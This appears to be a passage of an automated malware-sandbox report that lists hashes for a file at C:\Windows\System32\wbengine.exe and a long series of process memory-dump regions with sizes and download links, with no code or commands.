f3bcf74844fa1c04a5ecea75fb1c65738eff4d4fa973b81cf0ea544e25632d3b

SHA512
4dd7c92d7600a0375dcc394ea111ecd0ecdccd6c02445791735fdc50ae7f4ba648f2f014fe40148aa0daf9e151ca4435823a7aaef7d0b98c2572ef72280a4471

Download Submit
C:\Windows\System32\wbengine.exe

Filesize
2.1MB

MD5
f4d014d71ba571db1e280b65526e3a00

SHA1
785ebbe65e75e81867d726fd738fb95b9037f0f7

SHA256
223a6e221a4707304f592fb117cdc7633653b6c4bf0dae6c8aa0131da3d639bf

SHA512
b834e487c0c5fa07c4cfc3233e564e0565546013fff0751469d30e61c5e4281f10c5a0caff18d39a32371d674081bbd241dcfc49b856794610df848e035bf79c

Download Submit
memory/560-1058-0x0000000140000000-0x000000014014C000-memory.dmp

Filesize
1.3MB

Download
memory/560-793-0x0000000140000000-0x000000014014C000-memory.dmp

Filesize
1.3MB

Download
memory/1548-1059-0x0000000140000000-0x0000000140179000-memory.dmp

Filesize
1.5MB

Download
memory/1548-806-0x0000000140000000-0x0000000140179000-memory.dmp

Filesize
1.5MB

Download
memory/1624-658-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/1624-772-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/1932-673-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/1932-558-0x0000000140000000-0x000000014012F000-memory.dmp

Filesize
1.2MB

Download
memory/2044-686-0x0000000140000000-0x000000014011C000-memory.dmp

Filesize
1.1MB

Download
memory/2044-879-0x0000000140000000-0x000000014011C000-memory.dmp

Filesize
1.1MB

Download
memory/2480-554-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/2480-661-0x0000000140000000-0x0000000140130000-memory.dmp

Filesize
1.2MB

Download
memory/2556-784-0x0000000140000000-0x000000014011B000-memory.dmp

Filesize
1.1MB

Download
memory/2556-662-0x0000000140000000-0x000000014011B000-memory.dmp

Filesize
1.1MB

Download
memory/2928-760-0x0000000140000000-0x0000000140131000-memory.dmp

Filesize
1.2MB

Download
memory/2928-647-0x0000000140000000-0x0000000140131000-memory.dmp

Filesize
1.2MB

Download
memory/2960-79-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-112-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-68-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-67-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-65-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-64-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-63-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-62-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-61-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-60-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-57-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-58-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-54-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-70-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-83-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-71-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-85-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-72-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-86-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-73-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-88-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-89-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-49-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-74-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-50-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-52-0x0000000000400000-0x0000000000519000-memory.dmp

Filesize
1.1MB

Download
memory/2960-56-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-90-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-55-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-91-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-75-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-76-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-93-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-59-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-96-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-66-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-77-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-94-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-78-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-98-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-114-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-113-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-80-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-69-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-100-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-111-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-110-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-81-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-102-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-103-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-82-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-84-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-105-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-87-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-109-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-92-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-97-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-99-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-101-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-104-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-108-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-107-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2960-106-0x0000000002A00000-0x0000000003A00000-memory.dmp

Filesize
16.0MB

Download
memory/2980-697-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/2980-591-0x0000000140000000-0x0000000140234000-memory.dmp

Filesize
2.2MB

Download
memory/3048-674-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/3048-1056-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/3048-805-0x0000000140000000-0x00000001401D7000-memory.dmp

Filesize
1.8MB

Download
memory/3104-515-0x0000000000400000-0x000000000054C000-memory.dmp

Filesize
1.3MB

Download
memory/3104-1066-0x0000000027FA0000-0x0000000028032000-memory.dmp

Filesize
584KB

Download
memory/3104-541-0x0000000026090000-0x0000000026634000-memory.dmp

Filesize
5.6MB

Download
memory/3104-543-0x0000000026640000-0x00000000266DC000-memory.dmp

Filesize
624KB

Download
memory/3104-1060-0x00000000278A0000-0x0000000027A62000-memory.dmp

Filesize
1.8MB

Download
memory/3104-1061-0x0000000027750000-0x00000000277A0000-memory.dmp

Filesize
320KB

Download
memory/3104-643-0x0000000000400000-0x000000000054C000-memory.dmp

Filesize
1.3MB

Download
memory/3104-1140-0x0000000028300000-0x000000002830A000-memory.dmp

Filesize
40KB

Download
memory/3104-1062-0x0000000027A70000-0x0000000027F9C000-memory.dmp

Filesize
5.2MB

Download
memory/3104-542-0x0000000026010000-0x0000000026060000-memory.dmp

Filesize
320KB

Download
memory/3104-539-0x0000000025F40000-0x0000000025F90000-memory.dmp

Filesize
320KB

Download
memory/3232-594-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/3232-709-0x0000000140000000-0x000000014022B000-memory.dmp

Filesize
2.2MB

Download
memory/3284-742-0x0000000140000000-0x00000001401C0000-memory.dmp

Filesize
1.8MB

Download
memory/3284-745-0x0000000140000000-0x00000001401C0000-memory.dmp

Filesize
1.8MB

Download
memory/3316-710-0x0000000140000000-0x0000000140188000-memory.dmp

Filesize
1.5MB

Download
memory/3316-952-0x0000000140000000-0x0000000140188000-memory.dmp

Filesize
1.5MB

Download
memory/3492-1032-0x0000000140000000-0x0000000140147000-memory.dmp

Filesize
1.3MB

Download
memory/3492-757-0x0000000140000000-0x0000000140147000-memory.dmp

Filesize
1.3MB

Download
memory/3532-756-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/3532-644-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/3988-19-0x000001E37F380000-0x000001E37F3A2000-memory.dmp

Filesize
136KB

Download
memory/4004-985-0x0000000140000000-0x0000000140168000-memory.dmp

Filesize
1.4MB

Download
memory/4004-722-0x0000000140000000-0x0000000140168000-memory.dmp

Filesize
1.4MB

Download
memory/4144-1052-0x0000000140000000-0x00000001401FC000-memory.dmp

Filesize
2.0MB

Download
memory/4144-767-0x0000000140000000-0x00000001401FC000-memory.dmp

Filesize
2.0MB

Download
memory/4388-1057-0x0000000140000000-0x0000000140216000-memory.dmp

Filesize
2.1MB

Download
memory/4388-773-0x0000000140000000-0x0000000140216000-memory.dmp

Filesize
2.1MB

Download
memory/4436-914-0x0000000140000000-0x0000000140169000-memory.dmp

Filesize
1.4MB

Download
memory/4436-698-0x0000000140000000-0x0000000140169000-memory.dmp

Filesize
1.4MB

Download
memory/5040-605-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/5040-618-0x0000000140000000-0x0000000140155000-memory.dmp

Filesize
1.3MB

Download
memory/5060-569-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/5060-581-0x0000000140000000-0x0000000140135000-memory.dmp

Filesize
1.2MB

Download
memory/5096-620-0x0000000140000000-0x000000014013F000-memory.dmp

Filesize
1.2MB

Download
memory/5096-733-0x0000000140000000-0x000000014013F000-memory.dmp

Filesize
1.2MB

Download